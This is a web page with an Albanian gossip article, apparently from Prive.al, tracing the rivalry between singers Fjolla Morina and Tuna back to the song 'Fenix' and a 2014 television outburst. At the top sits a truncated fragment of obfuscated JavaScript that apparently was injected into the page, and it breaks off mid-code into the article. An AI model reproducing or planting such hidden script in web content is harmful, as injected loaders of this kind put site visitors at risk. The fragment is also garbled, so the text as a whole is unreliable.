;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Si lindi armiqësia e Fjollës me Tunën?

By

Fjolla Morina i është rikthyer sherrit me këngëtaren Tuna Sejdi.

Në ‘Shiko Kush Luan’, tek pjesa e lojës me paintball ajo i çoi dy selame koleges.

E para, të heqë dorë nga muzika dhe e dyta, të heqë dorë nga thashethemet pasiqë, gjithmonë sipas Fjollës, Tuna hyn në grupin e këngëtareve që e kanë mbushur estradën me thashetheme.

Por, kur dhe si nisi rivaliteti mes dy vajzave?

Zanafilla më e hershme duket të jetë rreth katër vite më parë, në kohën e hitit të pakontestueshëm ‘Fenix’.

Lëvizja e famshme e Tunës me ‘zogun’ nuk ishte pritur aspak mirë nga Fjolla. Ajo pati bërë një postim ku shprehej: ‘Keep calm and paloje zogun’. Më pas, një fragment të tillë e kishte përfshirë edhe si ‘diss’ në një këngë të saj.

Fjolla Morina pati shpërthyer me akuza ndaj Tunës edhe në emisione televizione. Në Shtator 2014, Fjolla ka thënë se Altuna Sejdiu është këngëtarja që s’ka bërë asgjë deri më tani. Sipas Morinës, Tuna me vetëm një këngë të saj ka arritur që t’i ulë të gjithë këngëtarët tjerë duke thënë se është e pa konkurrencë.

“Ne të gjithë kemi konkurrencë. Për atë arsye edhe unë e kam bërë një këngë paloje Zogun, dhe kam dashur t’i tregoj asaj se ku e ka vendin”, pati deklaruar Fjolla në një intervistë për mediat në Shqipëri.

Duket se disa rivalitete nuk shuhen me kohën dhe ky i Fjollës me Tunën është një prej tyre. /Prive.al

Artikuj të ngjashëm